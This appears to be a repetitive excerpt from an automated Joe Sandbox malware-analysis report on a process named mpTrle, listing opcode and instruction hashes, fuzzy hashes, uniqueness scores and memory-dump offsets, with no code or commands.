                                                      • Instruction Fuzzy Hash: FC2171755083809FCB06CF24D994711BF71EB46714F28C5DAD8458F266C33AD85ACB62
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cbae19213a40bc23c443c22e54dec0358cc97f92641666c950d3cad9666ed043
                                                      • Instruction ID: f22e11e065b71977de8e16b770804943aa63a187925713ea7fa05e42b0639c73
                                                      • Opcode Fuzzy Hash: cbae19213a40bc23c443c22e54dec0358cc97f92641666c950d3cad9666ed043
                                                      • Instruction Fuzzy Hash: 3C118231B042049FEF6AAB79E44437A3799FB86324F214939E006CF251DB25CD458BD2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1ee08fe9a5ff8bab6f22b17b490ffc447878a7004d3e82ebe07b82b6b7efae7
                                                      • Instruction ID: 726f7f3e337001dc47d5dca25dc5ce169bdb572ddce3a4e3a466d91755962dc2
                                                      • Opcode Fuzzy Hash: b1ee08fe9a5ff8bab6f22b17b490ffc447878a7004d3e82ebe07b82b6b7efae7
                                                      • Instruction Fuzzy Hash: 91110E36F002019FCF11AB78AC8875F7FFAAB89350F140666E942E7354EA349842CB81
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85eeacd6f61de8eea13aacc93643a383a6d34e0d41d3ac40c49ac1dad8675787
                                                      • Instruction ID: 5cf41f623b9d3b57d93e472fe6b9d638a4c8b6e668e669cd97cd99c984fd420e
                                                      • Opcode Fuzzy Hash: 85eeacd6f61de8eea13aacc93643a383a6d34e0d41d3ac40c49ac1dad8675787
                                                      • Instruction Fuzzy Hash: 33118432B001288FCF55AA78DC547AE77EAEBC8355F11853AD406E7354EE65EC0287D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b4dbf90693add9d6ad0df0d8cfeb11973b29c719ec1877e630e2f3ab26fcf376
                                                      • Instruction ID: 16016a08993041b71f332db6476a6ca247b5a97ede11191c41c806c91f4ea78d
                                                      • Opcode Fuzzy Hash: b4dbf90693add9d6ad0df0d8cfeb11973b29c719ec1877e630e2f3ab26fcf376
                                                      • Instruction Fuzzy Hash: DD01F5307045214FDB118B78586872F6BE6CBC6311F24846BE40AC7341DA29DC078385
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8b7056fdb74628d4970c6497ff6728b1cff143c140f3e2b2b2fddfca7e71f39f
                                                      • Instruction ID: 608eefd610215f5a7e75f5f6ec3b4d81f961db0761cad63e3fb901d4a95b935c
                                                      • Opcode Fuzzy Hash: 8b7056fdb74628d4970c6497ff6728b1cff143c140f3e2b2b2fddfca7e71f39f
                                                      • Instruction Fuzzy Hash: B921C0B1901219AFCB00CF9AD884ADEFBB4FB49350F50852AE918B7200C374A954CFA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fb9afd7927f8899af193a7a9bf83582c9df0073babce79d99461c41d9c46754b
                                                      • Instruction ID: 084b3c076bcf1631b63df00e45654d5e20f2cd3f21458e3ffca8c6412f75eb62
                                                      • Opcode Fuzzy Hash: fb9afd7927f8899af193a7a9bf83582c9df0073babce79d99461c41d9c46754b
                                                      • Instruction Fuzzy Hash: D4012D36E012258FCF26EFB984451AE7BF5EF89310F26047AD406EB341EA35C9418B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e0b8db887cd970748548ca0d2a202ca0253ba6be4f1ad83cf1a5ba76073b846
                                                      • Instruction ID: eae7405b0a883eee1a88bc573c9df8d4aaed37dc194b9e9241353c6ed60d3da7
                                                      • Opcode Fuzzy Hash: 0e0b8db887cd970748548ca0d2a202ca0253ba6be4f1ad83cf1a5ba76073b846
                                                      • Instruction Fuzzy Hash: 4F018F32B000185FCF56AA799C157EF77AADBC9360F01413AE546D7388EE64AC0287D1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 190f2adbd58e310c3e8d5cb945d4cbb42e10cfc15b9ae4bbce9afdcafabea1d1
                                                      • Instruction ID: aaea99e564fc0e216119cd0fb0a3202dba2d7efac38dd789f62e4ae8f576e2a5
                                                      • Opcode Fuzzy Hash: 190f2adbd58e310c3e8d5cb945d4cbb42e10cfc15b9ae4bbce9afdcafabea1d1
                                                      • Instruction Fuzzy Hash: F50162357005140BDB249AAD985971FA7DADBC9711F10843BF50EC7345D979EC068395
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6db65ca643381451e5fd6a53061ec2dc47bd588ab140ff32f320e64bb92863b9
                                                      • Instruction ID: ad0d02735eaa561604203d1d04f06a930d571775556488eb8c3809a5c4a2081a
                                                      • Opcode Fuzzy Hash: 6db65ca643381451e5fd6a53061ec2dc47bd588ab140ff32f320e64bb92863b9
                                                      • Instruction Fuzzy Hash: BC018131B005254BEB24DA7D985872F67DBDBC9721F20883BE90ACB341DE29EC0643D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3be9794ae948cabaf100d87028b52a996edd1057242d4aafc6fd56dfb1a76ac3
                                                      • Instruction ID: e25f099e8036da0772ac5b0ca651635d327cda5a90e9efcf91400718b72f0d33
                                                      • Opcode Fuzzy Hash: 3be9794ae948cabaf100d87028b52a996edd1057242d4aafc6fd56dfb1a76ac3
                                                      • Instruction Fuzzy Hash: 090181307001144FDB20EA7CE854B2B77DADBCA315F20843AE50ACF345EB29EC458784
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a52a1dd41fd32bec9b48cffed3e6b90207682c8e0b3a849297ec1b9738dd615
                                                      • Instruction ID: bbbaae2fa7f8a8ed784f921683467bb70f7ad687a9ca4e68fba66fc35d6575c6
                                                      • Opcode Fuzzy Hash: 3a52a1dd41fd32bec9b48cffed3e6b90207682c8e0b3a849297ec1b9738dd615
                                                      • Instruction Fuzzy Hash: 76011A39B00204DFCB15CFA4C8A8A9EBBF2AF88320F10C429D44AD7765DB34AC42CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655222983.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_390000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0f4fc3bf6d5b6829e0979997caa68e6cbdd6daf172cf0832e7e3b6f8cb49323
                                                      • Instruction ID: fe85346506e5176c5b10934bb3fba30d5f0734ee7e7f043ed6db26bd45c8fd7f
                                                      • Opcode Fuzzy Hash: b0f4fc3bf6d5b6829e0979997caa68e6cbdd6daf172cf0832e7e3b6f8cb49323
                                                      • Instruction Fuzzy Hash: 1DF03174A1530CAFD740FFF5F88269D7BB6EB80311F504579D1099B254DE702E558B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 85cf0edeac110c4295e913f50828f069e63c3159ba6b7b70e50ed937157d4022
                                                      • Instruction ID: 6f8281ae03fd6c440afaf6adec08174901edaff28caf4ce4b50b3cf864be3727
                                                      • Opcode Fuzzy Hash: 85cf0edeac110c4295e913f50828f069e63c3159ba6b7b70e50ed937157d4022
                                                      • Instruction Fuzzy Hash: F5F08235A04214DFCB28AE50EB847AE77B4EB95312F2404A3DC01E7252C3F89D9ACB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: adc04fd76bdfc3332afb36d09165596145dc0b140ccf20da5e26c6c2c1a7e388
                                                      • Instruction ID: 40af004379b8d15f20368443bd468beed6d68ea5df20bc05ec8181eee6d28f0a
                                                      • Opcode Fuzzy Hash: adc04fd76bdfc3332afb36d09165596145dc0b140ccf20da5e26c6c2c1a7e388
                                                      • Instruction Fuzzy Hash: B0E09A32E002289BDF249AA9A8145AFBBA9E785761F10043BED0AE7300D561AC098391
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000010.00000002.655326582.0000000000450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_16_2_450000_mpTrle.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ho}$ho}$|n}$|p}
                                                      • API String ID: 0-3148677294
                                                      • Opcode ID: 33f850d345223644b6a3ccd2652a7c2dace9bfeb4ec051fa944128c3dba4e3b0
                                                      • Instruction ID: 08968a396bf500483ea4682690a32262fc4015914294d8c001911bd3052d2f2b
                                                      • Opcode Fuzzy Hash: 33f850d345223644b6a3ccd2652a7c2dace9bfeb4ec051fa944128c3dba4e3b0
                                                      • Instruction Fuzzy Hash: 2D715531A04315CFDB14CFA5C44569EBBB2EF85301F24866BD805AB346EB74ED86CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%